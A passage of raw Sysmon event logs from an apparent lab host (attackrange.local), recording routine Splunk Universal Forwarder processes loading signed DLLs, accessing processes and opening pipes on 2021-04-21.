Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605800Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605799Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605798Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605797Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x80000000000000001605796Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.419{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605795Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605794Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:32.404{21761711-7A4C-6080-BF60-00000000BB01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605793Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605792Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605791Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605790Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605789Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605788Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:32.404{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001605962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.923{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x80000000000000001605961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.923{21761711-7A4D-6080-C160-00000000BB01}26244992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.923{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.923{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x80000000000000001605958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.876{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.876{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D065386A7AE1DA96501A12E2970ED10A,SHA256=8725BADD1757209A96661734E6F1C4BA2D60DB7BEEFBD9392166D379D828D06Ffalsefalse - insufficient disk space 734700x80000000000000001605956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.807{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.807{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.807{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001605952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001605951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001605950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001605949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001605948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001605947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001605945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.792{21761711-7A4D-6080-C160-00000000BB01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 